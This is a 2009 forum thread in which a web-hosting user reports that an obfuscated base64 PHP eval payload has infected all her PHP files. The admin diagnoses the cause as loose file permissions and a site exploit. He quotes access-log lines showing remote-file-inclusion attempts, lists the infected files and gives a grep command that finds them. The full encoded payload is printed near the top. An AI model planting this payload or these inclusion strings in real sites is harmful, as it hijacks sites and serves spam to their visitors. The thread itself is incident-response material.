News:

The anti-spam plugins have stopped being effective. Registration is back to requiring approval. After registering, you must ALSO email me with your username, so that I can manually approve your account.

Main Menu

HACK'D!

Started by Miluette, June 20, 2009, 05:10:07 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Miluette

HEY, so suddenly I found out that every PHP file I have uploaded throughout all my sites has had something like this appended to the top of the file:


<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9taWxsZW5uaXVtL3B1YmxpY19odG1sL2ZvcnVtcy9UaGVtZXMvTWlkbmlnaHRNaXN0XzFfMF94L01pZG5pZ2h0TWlzdF8xXzBfeC9NaWRuaWdodE1pc3QvaW1hZ2VzL2JiYy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvbWlsbGVubml1bS9wdWJsaWNfaHRtbC9mb3J1bXMvVGhlbWVzL01pZG5pZ2h0TWlzdF8xXzBfeC9NaWRuaWdodE1pc3RfMV8wX3gvTWlkbmlnaHRNaXN0L2ltYWdlcy9iYmMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>


I reinstalled my Wordpress installs and am reuploading everything else. I found this out when suddenly files I was uploading were smaller than live files, and when someone pointed out that all the text on my sites looked like spam text on his phone browser. :[

How do you think this happened? I still gotta fix my oekaki and news files too, gah.
Arggh, and my forum too. Can you have SMF forums auto-reinstall like Wordpress? (Well, I just updated it 1.1.9, but there're still some old hacked files.)

Gah, even my plugins are haxed. D:

EDIT: Okay, I reuploaded everything but my plugins and forum themes. Guh.

Someone's explaining how this could have happened: "shared server php upload and/or append hack" Just when I thought I never had to worry about permissions!
He says the hack may be this: http://www.lonelyfetus.com/hack.txt
And looks like this decoded: http://www.lonelyfetus.com/decodedhack.txt or something
If that helps.

Actually, looking more closely at that, it mentions the directory of a forum theme I wasn't even using and thought I had deleted. I bet one of the forum accounts that signed up but never posted did this. e__e

Note that I think this happened on the 15th and again on the 17th, since that's when all my files were modified on the server despite my having not touched them in ages.
And wasn't it you who told me,
"The sun would always chase the day"?

Xepher

Well, due to the way the server is set up, and provided you hadn't changed the permissions on any files to be world writable (chmod 777, which you should NEVER need to do here) the hack had to have come from an exploit on your own site. Most likely wordpress or another similar PHP package. This sort of thing is VERY common. I see it all the time at work, and it's the reason I've designed the server's systems in the way I have, so that if one account gets exploited, the exploit shouldn't be able to affect anyone else.

Now, as to fixing it... I do make nightly backups of everything in all accounts, so I can revert your files to the day before the hack if you want. At that point you can proceed to upgrade everything and try to secure it. I don't know if it will break stuff in wordpress since you've already upgraded the database possibly.

I see dozens of exploit attempts in the logs (which isn't surprising) and specifically these from the 15th


76.8.190.193 - - [15/Jun/2009:03:39:03 +0000] "GET /index.php?action=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 29380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

70.84.173.226 - - [15/Jun/2009:12:54:14 +0000] "GET /index2.php?page=http://www.walkinroll.org/site/components/com_ignteam/Response.txt???? HTTP/1.1" 200 20875 "-" "libwww-perl/5.76"

64.127.40.199 - - [15/Jun/2009:18:48:33 +0000] "GET /index.php?board=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 29379 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"



Now, because of the way you have rewrites set up, that could've been the root of any one of your sites. Basically, they're trying to trick the code into loading the remote code in the URL they give.


Anyway, let me know if you want me to restore backups of anything. I can put it in a separate folder to let you pick through things if you want. Also, you'll want to make sure to login to https://xepher.net/user-services/ and change your password, as any hack that can change your PHP files could possibly have read your database password from the configuration for a forum or wordpress, etc.

Xepher

Okay, I just checked. It looks like huge amounts of your files are world and group writable. So the exploit could theoretically be on someone else's site, but only infected yours because that's all it could write to. It's very important NOT to chmod 777 anything. In fact, files should always be 600, and directories 700. I've reset all the files in your public_html folder for you.

Xepher

Here's a list of files that are still infected...


./public_html/forums/Sources/CustomProfile.php
./public_html/forums/Sources/ProfileComments.php
./public_html/forums/index.php
./public_html/forums/Themes/DefGray/index.template.php
./public_html/forums/Themes/DefGray/index.php
./public_html/forums/Themes/default/ProfileComments.template.php
./public_html/forums/Themes/default/languages/ProfileComments.english-utf8.php
./public_html/forums/Themes/default/languages/CustomProfile.english.php
./public_html/forums/Themes/default/languages/ProfileComments.english.php
./public_html/forums/Packages/backups/index.php
./public_html/forums/Smileys/default/index.php
./public_html/forums/Smileys/classic/index.php
./public_html/lf/images/skin/yu/rotate.php
./public_html/lf/pages/bottom.php
./public_html/lf/pages/404.php
./public_html/lf/pages/top.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/uninstall.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/icons.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/core.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/adminmenu.css.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/mu.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/options.php
./public_html/lf/pages/wp-content/plugins/db-cache/db-options.php
./public_html/lf/pages/wp-content/plugins/db-cache/db-functions.php
./public_html/lf/pages/wp-content/plugins/db-cache/db-module.php
./public_html/oekaki/advanced/config.php
./public_html/oekaki/advanced/dbconn.php
./public_html/oekaki/advanced/banner.php
./public_html/oekaki/advanced/notice.php
./public_html/oekaki/advanced/announce.php
./public_html/oekaki/sketchyfun/config.php
./public_html/oekaki/sketchyfun/dbconn.php
./public_html/oekaki/sketchyfun/banner.php
./public_html/oekaki/sketchyfun/notice.php
./public_html/oekaki/sketchyfun/announce.php
./public_html/mil/lp_admin.php
./public_html/mil/lp_recookie.php
./public_html/mil/comic.php
./public_html/mil/kiriban.php
./public_html/mil/pages/wp-content/plugins/ozh-admin-drop-down-menu/uninstall.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/ru_RU.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/en_US.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/it_IT.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/nl_NL.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/uk_UA.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/tr_TR.php
./public_html/mil/pages/wp-content/plugins/db-cache/db-options.php
./public_html/mil/pages/wp-content/plugins/db-cache/db-functions.php
./public_html/mil/pages/wp-content/plugins/db-cache/db-module.php
./public_html/mil/pages/wp-content/backup-6cb44/index.php
./public_html/mil/online.php
./public_html/mil/updates.php
./public_html/mil/gallery/index.php
./public_html/ai/huh.php


All found with

find -iname "*.php" -exec fgrep 'eval(base64' -l \{\} \;

Miluette

#4
Thank you! I never manually change any of my files' permissions - except a few days ago I DID chmod a folder to 777, which only had some thumbnail files in it, and probably forgot to change it back to 700. 'Zat bad? D:

It's possible that some of my files were still world and group writable from waaay before the server upgrade, back when I had to fix permissions for my PHP files after uploading them, or something. (Actually, maybe not. I've changed pretty much everything since then.) But I know most of them were 700, and all of them were affected, lol. So you reset aaaall the sites' permissions? Yay! All should be well if I just upload things and leave them alone, then?

And yeah, don't revert anything. I did a good bit of unrelated modding after trying to undo this hack last night (and since the 15th, even), and I can't specifically remember what I'd need to redo, lol...

When I change my password, will all my database-based things break until I edit their config files?
And wasn't it you who told me,
"The sun would always chase the day"?

Databits

Xepher, can't you just change the permissions for the user home directories to help prevent this from other infected sites in the future?
(\_/)    ~Relakuyae D'Selemae
(o.O)    
(")_(")  [Libre Office] [Chrome]

Xepher

I have changed them so that everything is 700, and the default is 700. However, a lot of CMS install instructions say "chmod 777 this file..." or some such. Nothing should EVER make stuff world writable, yet I always find files set that way.

This particular hack does look to have come from her own site though. I searched and no other php files on the system (despite many being world writable again) were infected with the same code.

Still though, if you have a suggestion for how to make things more secure, let me know.

Miluette

Yeah, some things instruct you to chmod files to 775 or 777 or something and I never do that 'cause there's no reason to. Everything still works even if you don't. \o/ (I hope. Don't wanna mess with my oekaki or anything anymore, not like that.)

Hey, hey, "When I change my password, will all my database-based things break until I edit their config files?" I need to know how quickly I'll need to edit everything else so that they work.
And wasn't it you who told me,
"The sun would always chase the day"?

Xepher

Oh, sorry, forgot to answer that. FYI, always feel free to hit me up on AIM/YahooIM/Gtalk... my screen name is "Xepher42".

To answer you though, yes, changing your password means you need to change it in the configs for all applications that access your database.

Miluette

It always looks like you have your away message on, lol. Unless you're actually not away all that time... :O
And wasn't it you who told me,
"The sun would always chase the day"?

Databits

He does almost always have his away message up, but hit him up anyhow. Even if he doesn't respond right away he tends to "get back to you". ;)
(\_/)    ~Relakuyae D'Selemae
(o.O)    
(")_(")  [Libre Office] [Chrome]

Xepher

Yeah, I work nights, so I'm only on at like 9am for an hour or two until my weekends (sun-tue). Like data said, leave a message. And I'll see it next time I'm on.

Miluette

I've been meaning to ask if you can check if there're any infected files left. I think I already took care of all of 'em, but I may have missed one.

In recent times I've found out that people in general, and some webcomics, have been hacked with a bunch of variations of this kind of attack...a lot. And the hacks I've heard of were a lot worse than replacing all the text with spammy gibberish, too. *shudder*
And wasn't it you who told me,
"The sun would always chase the day"?

Xepher

Nothing left with that same hack in it.

Miluette

And wasn't it you who told me,
"The sun would always chase the day"?